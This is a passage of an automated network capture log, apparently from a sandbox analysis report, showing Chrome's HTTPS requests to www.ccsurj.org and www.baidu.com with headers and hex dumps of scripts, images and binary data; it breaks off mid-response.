                                          2025-01-12 00:17:01 UTC16384INData Raw: 88 fc 98 3f 0e b5 e9 72 24 06 1e 09 55 66 93 60 e7 76 d4 11 43 44 54 fa ae b9 a5 a1 0c d8 a9 1e dc 9d 15 db 7f 86 fb 91 a2 08 f5 3b be c0 8c f3 9b 55 9f f1 a6 fa 22 37 ea c1 2a 0f 3f df 5c e7 aa 8d 0f 1b 29 92 7c 06 18 f0 49 ea 87 8b f6 9b 3e 78 c2 3c a8 31 23 c9 90 e1 b6 84 bf 9a 4a ab e9 44 5f 64 c6 a7 9c 1a 36 4b c8 f7 3a c9 5e 0f 83 36 32 24 47 aa 7e 26 c8 42 00 18 fd 28 14 7d fb 19 6b 08 29 92 5c f1 dd 34 ae 7a b9 55 d5 59 41 f0 97 c3 d3 95 2e 55 42 5f 8a 17 0f f9 2b 11 d8 51 9a 8e 47 fa 8d c3 dc 84 aa 9b 91 11 35 c2 72 10 98 41 45 c9 e1 1f 85 e4 d8 2d 37 c3 7f 12 6b 32 48 7f 31 f9 d3 89 ac 39 95 f5 ed 6c 53 bf d3 3a e3 3b 8a 81 87 62 24 63 c3 1b 56 30 c6 1a 5f 80 d1 8d d4 0d aa 73 a4 ca 2d d8 ec a6 9d 5c 72 9f db 5c 25 72 2e 4b 02 30 8d 64 4a 60 44
                                          Data Ascii: ?r$Uf`vCDT;U"7*?\)|I>x<1#JD_d6K:^62$G~&B(}k)\4zUYA.UB_+QG5rAE-7k2H19lS:;b$cV0_s-\r\%r.K0dJ`D
                                          2025-01-12 00:17:01 UTC16384INData Raw: df 62 c7 19 4f 7e 71 af 9d 63 d9 52 3b ba fb c7 0a a3 86 8c b7 6a 5f 43 7c 0a f2 1e 25 d9 57 6c 56 a6 24 27 e3 dc 50 4e a7 51 af 38 8f 14 b3 18 e0 64 cb ea d6 d5 65 97 3a 20 0a d8 af 01 f5 d7 9d 7f 0d e6 30 e6 ca 35 bf f0 91 c4 22 36 9c d3 99 bc aa 34 b9 b6 b4 1b 72 dc a7 d6 6a 31 d6 3d 3a 6d 12 a0 92 21 8b 60 4c b5 e6 fa 0f 23 6e 36 ac 34 98 6d 17 28 8b b7 0b ce b2 b1 8d 3c b3 18 60 37 d4 1f bf 82 ca 8f 0e 41 d4 24 ad da 25 0a 98 34 3a e5 e0 e4 99 d4 a4 77 cc d6 76 ff 00 8a 75 0c 9b 61 1c 22 15 2e a9 8f e9 0c fc cb 8e 53 3a f1 01 83 da 2e 3d 55 83 19 db f3 4b 8a 7b 14 ca ab ad 49 72 9f 51 7e 8f 0a 3b 31 29 b3 e5 c7 50 71 52 1e d0 18 a8 68 48 99 da 99 32 44 ec 9e ac 6b d1 3b 88 32 08 b2 38 9c c7 6a d3 ef cd 66 cd 15 bf 6f 8a b4 62 8f 02 e5 7c 6e 0a ac 29
                                          Data Ascii: bO~qcR;j_C|%WlV$'PNQ8de: 05"64rj1=:m!`L#n64m(<`7A$%4:wvua".S:.=UK{IrQ~;1)PqRhH2Dk;28jfob|n)
                                          2025-01-12 00:17:01 UTC16384INData Raw: c2 3b 45 f4 6c 6b 1b dd 7e f0 f6 d8 59 34 a9 e1 1c cd 85 62 73 a8 6c 01 92 09 29 22 6e e3 77 08 9f df 5e f3 83 4f fc ad 57 c6 7f 17 61 3f f9 3e 1a f5 ee 89 6f 4a 4c 8a 7d 22 9e eb 4e 1b 68 b3 47 2f 70 88 99 1d a9 bb 39 45 e7 51 c6 4b 1d 11 49 fc 1e f9 3d b4 30 0e 9b ae 7f f1 2a 3b 63 41 59 0b 21 15 e8 d2 99 10 c6 c3 ee bd f1 ec a7 f4 4d 79 36 2f aa ce ca 41 94 90 42 87 18 99 69 c7 19 2d f9 03 0d 8d b4 45 e9 5c 9a a8 aa af d3 4d 55 99 ba ef 0f c3 0b 07 fc 27 f8 83 a6 13 2d b7 25 cb 5a 14 87 9d 54 c1 38 b1 e4 a6 17 92 fd 29 f7 d5 fc 0b b2 bd a7 cd 63 7e 24 cd c8 20 76 51 dc a7 c9 24 07 5c 91 95 40 05 43 da d6 e2 47 3d cb e6 5f b2 77 d7 ba 6c d4 17 c1 26 6e 67 1b 1b 2a 14 b7 15 2a b2 98 72 3d 47 0f bc 25 18 5a 4d ca b9 0c 29 b6 9d 95 47 3c a6 aa 4d 8b 04 1f
                                          Data Ascii: ;Elk~Y4bsl)"nw^OWa?>oJL}"NhG/p9EQKI=0*;cAY!My6/ABi-E\MU'-%ZT8)c~$ vQ$\@CG=_wl&ng**r=G%ZM)G<M
                                          2025-01-12 00:17:01 UTC16384INData Raw: 05 7f 32 7f c4 4d be 00 e2 0a b2 d9 38 a9 b7 6b e2 28 bb 78 ff 00 5f ed a9 62 53 c5 21 fb 46 92 8b 70 5a cd 9f e7 38 75 36 1c 16 fb e7 73 82 5e a4 ce 53 bf 1a 68 16 55 3c 41 a6 a7 34 06 26 a8 ba fb 71 fa 51 d8 33 59 0c 87 0b c9 ae c5 da bd bf 7d 5e 68 5e 32 72 ec fe 4a 05 4a 28 ca 65 c6 16 03 93 a1 03 80 43 b3 08 22 5c e1 13 e5 5f eb fe 9a 63 94 c3 21 6e a0 a8 1e 64 d9 8e 34 e1 88 86 cc 44 45 da 26 3b 93 ea ab f6 4f 6d 01 1a 2b 4c 9b 54 24 ec 40 9c 15 97 8d 08 85 a9 b0 c5 c6 f6 fb a0 1e d2 0c 63 fa ea 94 9b af 43 86 75 ab 6b 76 99 d0 ad d2 e6 46 0e 9b ed c9 6d 09 50 91 09 04 b8 35 2e e2 ab fb 7b 69 61 5e ab 5f 43 bf 0d f5 19 34 9b ea ea a9 30 6a 6f c6 b4 a7 1d 3d ac 6f ea 2b 64 8b 8e fc 8a f6 f6 d3 e2 dd 56 c6 36 9a ba 77 c2 ef 1c 2b 37 9d e9 4a b6 ea 36
                                          Data Ascii: 2M8k(x_bS!FpZ8u6s^ShU<A4&qQ3Y}^h^2rJJ(eC"\_c!nd4DE&;Om+LT$@cCukvFmP5.{ia^_C40jo=o+dV6w+7J6
                                          2025-01-12 00:17:01 UTC16384INData Raw: 0d 82 bb 54 52 6d ea a4 78 8c 74 a5 52 c5 c7 10 10 45 05 17 a6 e7 2a 2a 9e 84 ff 00 65 d5 fc b4 2a 92 43 86 cb a1 7c 3d b8 63 c8 a2 51 eb 93 2d 14 4a b0 2b 8d 93 d1 cb a4 4e 22 70 32 48 91 0b 23 9d d8 1c 61 75 e6 f8 9b 72 ba 81 d1 5e 6b 19 ba 97 59 39 15 17 a5 47 9c a5 12 44 39 29 2a ac fc 6c a0 ba 46 99 06 07 8d db 90 be 64 cf 19 f6 d5 7c 3c 79 50 b9 0e c5 be db 6e 34 d8 af 45 a8 36 32 9d 58 01 16 4b 79 26 a3 26 ed ca 04 bb 97 26 ab e9 55 ce b4 0c 54 84 4d a2 ad b7 68 30 20 56 6a 27 09 a7 9c a9 98 8b 2f 44 26 96 32 3d 19 92 de a6 06 88 88 6e 2e ec ae 30 2b 8c 68 df 8c f0 d1 3a 05 03 53 a0 5d 22 cb 47 6e c0 84 4c ab 4d fc 43 6c a7 5b 8b b1 d9 5e 50 b9 fc b6 f7 7a 5c 2f b7 3a c0 9d dc c3 dc 79 2b a5 a4 21 fa bc b8 95 0a 7b 8b 59 be 1c 41 90 f1 f5 ad 69 a3
                                          Data Ascii: TRmxtRE**e*C|=cQ-J+N"p2H#aur^kY9GD9)*lFd|<yPn4E62XKy&&&UTMh0 Vj'/D&2=n.0+h:S]"GnLMCl[^Pz\/:y+!{YAi
                                          2025-01-12 00:17:01 UTC16384INData Raw: 2e 8a 1d 69 9b a6 8d 72 49 b6 d1 a1 13 72 94 ec 98 2e 3e 08 a8 0d ba 44 42 84 a9 9c 63 db ba aa 6a 84 1c 5e 1e 2d 0b b2 58 f5 d0 aa 2e 0f 1a 82 0a 7e 5a b7 c5 72 f5 28 15 f8 6e 43 a7 ad 66 43 8d 37 6f 50 18 41 7a 1a af 67 0f a8 22 a2 db c6 2b b1 3d 49 c7 ed af 11 8e e0 f1 e1 f4 cc e2 7b ab cd 83 3c 7d 6f bf 44 5b 57 4b d8 1a aa c6 83 5f fe 1b 08 52 9a 96 71 54 05 d9 ef 32 02 bd 57 1c 22 20 7c 54 71 bb 03 9d a2 b9 d6 27 b3 61 fa 8f f7 df bf c1 56 92 c6 81 29 eb d5 3a b5 d3 29 69 74 bf cc 4a 72 a7 c7 6f 17 69 c0 eb 31 9c 5e ea 0e ba 5b fa 61 ea 34 f4 1a e7 3e 9d 68 e0 b0 6c 83 c4 6a bb 7a fd 55 37 02 e7 21 4a 3d 91 44 6e a3 2c 2e aa 8d 59 da 38 b5 1e 7b 4f bf 29 d1 a5 ab 82 22 cb 4c bc 32 87 02 6f 1e 5d 24 ee 88 98 6d 39 2d 6b 4b 8b 2d 8f f9 4d a3 f2 28 f6
                                          Data Ascii: .irIr.>DBcj^-X.~Zr(nCfC7oPAzg"+=I{<}oD[WK_RqT2W" |Tq'aV):)itJroi1^[a4>hljzU7!J=Dn,.Y8{O)"L2o]$m9-kK-M(
                                          2025-01-12 00:17:01 UTC16384INData Raw: dc a6 df 6b a6 b2 03 96 fa 66 83 d5 70 50 41 7d 3b fd d7 0a b8 d7 a6 c4 1d 08 5e 14 6a 45 94 e5 0b da a9 6f bd 86 1f ea ca 7d e4 9b 35 43 60 ee 35 5c 61 05 39 1c ed da b9 fe ba f2 78 b8 5b 26 8b 58 e2 dd 96 93 6a 44 ea 7d b3 6b d3 ae 7a d3 11 e4 5d f7 18 9f 90 c0 b7 2f c9 c2 05 fc d7 93 04 a8 8e 92 96 13 9e 3d 93 58 1c 87 97 e4 66 8d ef e4 a9 39 cc ab d9 23 ea 2e 57 6f 08 b4 0a 3c aa cd c5 4d b5 ee 4b 95 c8 bf 1b 37 87 a3 22 5c 10 17 84 5e ea 1f a3 60 ae 7b a2 27 7d 7a 0c 36 10 43 e2 00 5d 2a 45 c6 ec 2e da a1 54 61 57 d1 e6 23 52 a4 47 a3 53 69 4c 1f c5 10 83 ac 4d 13 9b 0d d0 26 76 a3 9d 53 6f 97 13 76 13 b6 bc 77 12 8d e1 ce 77 df df 9a b0 db 21 54 dc 14 46 0a 0c da f8 03 ad 05 bb 50 12 fe 1a 71 e5 64 ea 0d b8 e2 6e d8 f2 8f 50 c5 37 26 1d 4e fc eb 3e
                                          Data Ascii: kfpPA};^jEo}5C`5\a9x[&XjD}kz]/=Xf9#.Wo<MK7"\^`{'}z6C]*E.TaW#RGSiLM&vSovww!TFPqdnP7&N>
                                          2025-01-12 00:17:01 UTC16384INData Raw: 26 c9 7e a4 a4 b0 e5 b6 80 48 40 da 26 e5 14 04 2e a2 61 39 5c 72 9e fa bb 41 23 26 65 36 e1 8e c5 51 b8 d3 ea b3 c2 30 b3 19 19 8c fc a6 8d d7 94 95 17 91 43 c2 22 aa fc a8 9f 2a 69 b0 bb 26 c9 27 45 59 42 b5 d1 ea 7c 2a 4d 22 da ac 30 eb f1 de 90 b5 37 ff 00 29 1e 61 b3 5f c9 6d b1 52 da 09 df 76 39 d1 4f 38 02 c9 4c 17 b9 57 12 59 9f 6f 12 b1 54 a8 c2 ae 41 7a 00 35 0e 13 06 46 de 5a 15 ea c7 79 0f d7 e8 c7 04 9c 2e 11 51 31 a8 68 04 02 b9 ef b5 26 ad 47 66 99 67 4f bf 2a 52 1b b6 2a 90 09 83 61 80 73 a5 f1 50 4d 8e 7a 33 f2 ba da 71 8d bc a7 3f 4d 1f bc 72 f4 40 35 4f 8b 6a a5 50 ad 5b be 76 e6 65 29 b2 69 15 76 e7 c5 8e e1 2b a6 f0 74 40 32 0f 21 61 73 ea 4c 61 55 32 ba ca 98 e5 3b ec 53 1d ee a4 cd df 0e e5 89 59 ab 7c 7a 95 3d ea 45 c2 6d a7 c3 59
                                          Data Ascii: &~H@&.a9\rA#&e6Q0C"*i&'EYB|*M"07)a_mRv9O8LWYoTAz5FZy.Q1h&GfgO*R*asPMz3q?Mr@5OjP[ve)iv+t@2!asLaU2;SY|z=EmY
                                          2025-01-12 00:17:01 UTC16384INData Raw: 3e da 6b 30 72 74 46 e8 f3 15 2d 8f 10 3c 37 4a 4b 14 7a f5 1a bd f1 48 ae 93 8c 56 de 19 0c f9 62 74 32 4c 34 d0 fa 50 fb 67 39 45 fb 69 87 0c fd 85 21 0d 01 94 5b 6a 8a 9f 74 d8 e0 33 82 6d 46 b1 48 94 d9 0a 46 74 4d 10 24 aa 7a 95 c1 02 13 12 55 45 c6 dd c8 89 df 1a 37 e1 5c 93 92 fa 29 55 1b a2 cc a8 93 09 6e 5c 8e 20 a8 aa 4e 7e 4b 64 ea b0 a2 5b bd 60 de 3d 4a 89 84 5e da 40 c1 9d 88 5c 5b 5b 84 cf f0 c6 65 32 a3 57 79 c8 f7 4c 19 b5 2f 82 d5 dc f2 8d a9 a8 bc d0 c7 c2 28 ab aa 88 aa 8b c1 22 a6 e4 e1 13 4e 8f 0f 90 ec 99 10 17 9b ad 21 49 f7 55 b4 51 85 8a 35 d6 6e 54 14 1b 49 af bd 25 f4 8c d2 b8 89 81 02 6d 09 0b 9e 17 3d bb 63 55 5d 83 04 ea 12 e5 89 9d 14 d8 ae 56 7a 6e 37 0a e3 e8 2f 95 09 2c cf 1a 89 38 0e 91 26 48 51 51 11 47 ff 00 57 f6 d0
                                          Data Ascii: >k0rtF-<7JKzHVbt2L4Pg9Ei![jt3mFHFtM$zUE7\)Un\ N~Kd[`=J^@\[[e2WyL/("N!IUQ5nTI%m=cU]Vzn7/,8&HQQGW


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          33192.168.2.449783154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:00 UTC368OUTGET /system/resource/js/formfunc.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:01 UTC350INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:00 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 1356
                                          Last-Modified: Fri, 10 Jan 2025 07:04:22 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c676-54c"
                                          Expires: Tue, 11 Feb 2025 00:17:00 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:01 UTC1356INData Raw: ef bb bf 2f 2a e6 8c 89 e9 92 ae e4 b9 8b e7 b1 bb e7 9a 84 e6 8f 90 e4 ba a4 e6 97 b6 64 69 73 61 62 6c 65 64 2c 20 e7 84 b6 e5 90 8e e6 8f 90 e4 ba a4 e5 ae 8c e6 88 90 e8 87 aa e5 8a a8 65 6e 61 62 6c 65 3b 20 e7 94 a8 e5 9c a8 e6 8f 90 e4 ba a4 e5 8a a8 e4 bd 9c e5 8f 91 e7 94 9f e5 89 8d 2c 20 e5 a6 82 20 6f 6e 73 75 62 6d 69 74 20 e4 b8 ad 0d 0a e7 94 a8 e6 b3 95 e4 b8 be e4 be 8b ef bc 9a 20 e5 8f 82 e8 a7 81 e6 9c ac e7 9b ae e5 bd 95 66 6f 72 6d 66 75 6e 63 64 65 6d 6f 2e 68 74 6d 0d 0a 2a 2f 0d 0a 66 75 6e 63 74 69 6f 6e 20 56 73 62 46 6f 72 6d 46 75 6e 63 28 29 0d 0a 7b 0d 0a 20 20 20 20 76 61 72 20 5f 74 68 69 73 20 3d 20 74 68 69 73 3b 0d 0a 20 20 20 20 5f 74 68 69 73 2e 64 69 73 61 62 6c 65 41 75 74 6f 45 6e 61 62 6c 65 20 3d 20 66 75 6e 63
                                          Data Ascii: /*disabled, enable; , onsubmit formfuncdemo.htm*/function VsbFormFunc(){ var _this = this; _this.disableAutoEnable = func


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          34192.168.2.449782154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:00 UTC369OUTGET /system/resource/js/dynclicks.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:01 UTC350INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:00 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 3504
                                          Last-Modified: Fri, 10 Jan 2025 07:04:22 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c676-db0"
                                          Expires: Tue, 11 Feb 2025 00:17:00 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:01 UTC3504INData Raw: ef bb bf 66 75 6e 63 74 69 6f 6e 20 5f 64 79 6e 43 6c 69 63 6b 73 5f 61 6a 61 78 28 29 0d 0a 7b 0d 0a 20 20 20 20 76 61 72 20 78 6d 6c 68 74 74 70 20 3d 20 6e 75 6c 6c 3b 0d 0a 20 20 20 20 74 72 79 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 78 6d 6c 68 74 74 70 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50 22 29 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 63 61 74 63 68 28 65 29 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 72 79 0d 0a 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 6d 6c 68 74 74 70 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 73 78 6d 6c 32 2e 58 4d 4c 48 54 54 50 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d
                                          Data Ascii: function _dynClicks_ajax(){ var xmlhttp = null; try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          35192.168.2.449785154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:00 UTC360OUTGET /images/logo-xxgcxy.jpg HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:01 UTC302INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:01 GMT
                                          Content-Type: image/jpeg
                                          Content-Length: 60109
                                          Last-Modified: Fri, 10 Jan 2025 07:04:21 GMT
                                          Connection: close
                                          ETag: "6780c675-eacd"
                                          Expires: Tue, 11 Feb 2025 00:17:01 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:01 UTC16082INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 30 00 00 00 52 08 06 00 00 00 4a 52 ee 17 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 1f 74 45 58 74 53 6f 66 74 77 61 72 65 00 4d 61 63 72 6f 6d 65 64 69 61 20 46 69 72 65 77 6f 72 6b 73 20 38 b5 68 d2 78 00 00 02 78 70 72 56 57 78 9c ed 99 4d 68 13 41 18 86 67 33 69 6c 9a c9 66 b3 14 f4 2e de 2b b9 14 a4 d0 28 68 ed 41 bd 14 7f c0 8b f6 07 51 41 c9 41 2a 5e 3c 09 c5 83 68 50 57 0f 9e 84 5a 09 48 ac 62 43 4d 69 b4 16 c2 16 44 45 85 22 8d 15 8d 1e a4 fe a0 37 33 7e bb cd 41 9a 05 51 bb b3 95 be cf ec 3b 4b 96 25 cf ec 7c c3 24 21 e5 5a 71 81 1d 63 6b a5 83 4d 4d da d4 5b d2 b2 a5 65 d9 ee 25 17 8b 9a 4d 57 ac 7e bb 9f 8e 94
                                          Data Ascii: PNGIHDR0RJRsBIT|dpHYs~tEXtSoftwareMacromedia Fireworks 8hxxprVWxMhAg3ilf.+(hAQAA*^<hPWZHbCMiDE"73~AQ;K%|$!ZqckMM[e%MW~
                                          2025-01-12 00:17:01 UTC16384INData Raw: ac ce ea e7 46 6e e3 5f d2 cf 1a 43 7b e6 19 8c 6d 55 7a a7 7e 88 e5 75 ef ef a5 2b a8 57 29 5a a7 e3 68 6c d5 f9 3c e6 7a 90 f9 ef d9 6c 5d 95 b0 51 9f ce b4 91 3b 1f eb 79 5c ef 22 7c 0e 97 8c bd 8d bf e6 a1 b7 2b 64 fc 90 93 5e ca 7f 1f 55 8a e8 c7 2f b9 bd af f2 7e 1d e5 76 dd f7 67 ac 68 9f 1d bb 5b cf fe b6 8d 47 ce 90 7e 3f ae fb fc 52 f3 bf da 68 fb cb e5 c7 92 e8 3c f5 aa 58 ee 6d e3 24 f7 f3 57 b3 50 b6 49 fe b6 b1 18 17 ea 2c 61 d7 f7 47 7c b6 e4 ff ab ec 1f 73 51 06 63 ab cf c9 b0 d0 bf 15 dd 3f 1f 8d ea 1b f5 da e2 ff 36 a3 7b 98 29 bb 76 66 ec 37 da a0 3e 9d 3b 3f d4 f2 2f 0e 73 77 3c 56 f6 9e 03 ac 1d b1 4f 3f af a9 0f fc 3c d4 ca ed 79 a8 5b e8 63 4b 9c 96 f4 b5 32 17 bb 39 bf e6 a4 9d 29 bb 76 7e c8 d5 7b 04 f5 69 ee 79 90 bc 94 ce c1 5c
                                          Data Ascii: Fn_C{mUz~u+W)Zhl<zl]Q;y\"|+d^U/~vgh[G~?Rh<Xm$WPI,aG|sQc?6{)vf7>;?/sw<VO?<y[cK29)v~{iy\
                                          2025-01-12 00:17:01 UTC16384INData Raw: 20 1e 65 e4 fd 27 ef 3d 8a d6 f8 3f 85 cd 98 6f e9 e7 f9 6e 80 ed b1 61 f6 eb ec 9b f4 bd 7c 37 18 8d 15 f9 3e 9a fd 3f c7 90 f4 55 96 25 cb 3b ab ef 12 8f a2 ad fc 8f 2f f1 6d f6 b5 9e 4e 7f 2f e8 e3 49 8e b5 d9 f7 66 f3 51 d6 83 fc 7a 7b c8 f1 3c d3 64 cc e9 36 e9 64 99 6e f9 3b e8 af da ca ff a5 b2 51 be 03 96 6d fb 7b 7b f7 35 ed 24 fd c0 fb 04 69 d1 a6 78 e6 14 ff 67 3c c6 24 f2 22 cd 5e be 25 3d ea fc af 94 52 4a 29 a5 9e 53 97 da e7 cd 74 ef 65 2f f9 d6 94 eb 20 97 b0 61 7d 1b cd be 6b fa f7 d4 5f b5 f6 79 b5 3f ac 39 d4 9a c9 6c cd 7a 8d d2 ff 7d 6d 23 bf f3 47 df fc 4b 6b 21 ac 9b f4 f3 6b 28 cb 39 ea 47 fc e3 31 bb bf 94 de e8 7a 96 d7 2c ad 51 bf 26 ee 6c cd 69 56 e6 bf 8a fd b2 dc fb 23 5f d6 3c f2 9c f6 c2 33 b9 ce 9e 6d 24 f7 5e 39 67 0d 97
                                          Data Ascii: e'=?ona|7>?U%;/mN/IfQz{<d6dn;Qm{{5$ixg<$"^%=RJ)Ste/ a}k_y?9lz}m#GKk!k(9G1z,Q&liV#_<3m$^9g
                                          2025-01-12 00:17:01 UTC11259INData Raw: 0b 10 0d d0 5d c8 cb 6c 29 42 2e b6 23 9a 9d ae 88 1f 94 6e a2 ea 83 68 bf b2 09 24 99 15 5a 3f 98 51 88 f4 53 f0 43 fc 32 42 50 fe 45 f3 fc 20 3e d0 d2 e9 1a 9b 78 ad 1d 3b 9a b8 ae 16 f1 23 32 6b 27 bd 08 d1 bc 1c 69 d7 2d 04 f6 7f 3c 32 0e 9a 22 95 c7 03 2e c2 c7 08 99 8d 31 43 cf c2 10 0c 43 91 67 64 28 42 62 86 d0 10 eb 69 5b 2d 88 cb f4 3b 33 e8 9c ee 03 93 81 d1 8e ec 36 2c 3b 14 72 31 34 0a a1 fa 6e 29 6d 13 47 c4 85 31 9e 93 10 b2 30 2b 4c 99 10 48 16 74 cc c1 20 9b fa 8a a0 b6 80 4e 80 b2 10 6d c6 0a 1a 6a 61 92 30 f6 1d 9a 46 a0 3f 8c 6e 82 6b 4b 73 cd 0a 02 1d 94 cb 30 62 ba 84 23 b7 66 3f af 13 0e ba 09 a9 b3 2d 32 0a bf db 83 cd d9 dc f5 44 e0 ad ae c6 5b 5e de 2c 13 92 0f 48 1c 3c 88 68 53 98 fe a2 d5 ab f1 49 f9 f8 3d 1e f2 bf ff 9e ed 59
                                          Data Ascii: ]l)B.#nh$Z?QSC2BPE >x;#2k'i-<2".1CCgd(Bbi[-;36,;r14n)mG10+LHt Nmja0F?nkKs0b#f?-2D[^,H<hSI=Y


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          36192.168.2.449784154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:00 UTC605OUTGET /images/ico_tz.png HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/style/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:01 UTC298INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:01 GMT
                                          Content-Type: image/png
                                          Content-Length: 672
                                          Last-Modified: Fri, 10 Jan 2025 07:04:35 GMT
                                          Connection: close
                                          ETag: "6780c683-2a0"
                                          Expires: Tue, 11 Feb 2025 00:17:01 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:01 UTC672INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1a 00 00 00 18 08 06 00 00 00 e4 82 ed c5 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 02 04 49 44 41 54 48 c7 b5 95 3d 68 54 41 14 85 bf 9b ac 28 62 c0 40 d0 80 98 42 90 58 d9 05 44 88 e2 0f a2 c4 42 b1 52 14 24 95 36 5a 28 44 82 4d 88 42 d0 5a 89 20 41 50 4b 0b 0b 0b d1 c2 26 bd a0 82 bd 11 4c 10 25 e0 5f 34 c9 67 91 d9 38 3e 76 df ee 92 e4 34 33 cc b9 e7 9e b9 77 e6 cd 83 15 42 1d 56 2f ae 34 4f 99 c1 51 75 d2 25 8c af 85 c1 5e f5 85 ff 63 b8
                                          Data Ascii: PNGIHDRgAMAa cHRMz&u0`:pQ<bKGDCpHYs~IDATH=hTA(b@BXDBR$6Z(DMBZ APK&L%_4g8>v43wBV/4OQu%^c


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          37192.168.2.449786103.235.46.964435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:00 UTC359OUTGET /img/baidu_jgylogo3.gif HTTP/1.1
                                          Host: www.baidu.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:01 UTC670INHTTP/1.1 200 OK
                                          Accept-Ranges: bytes
                                          Cache-Control: max-age=315360000
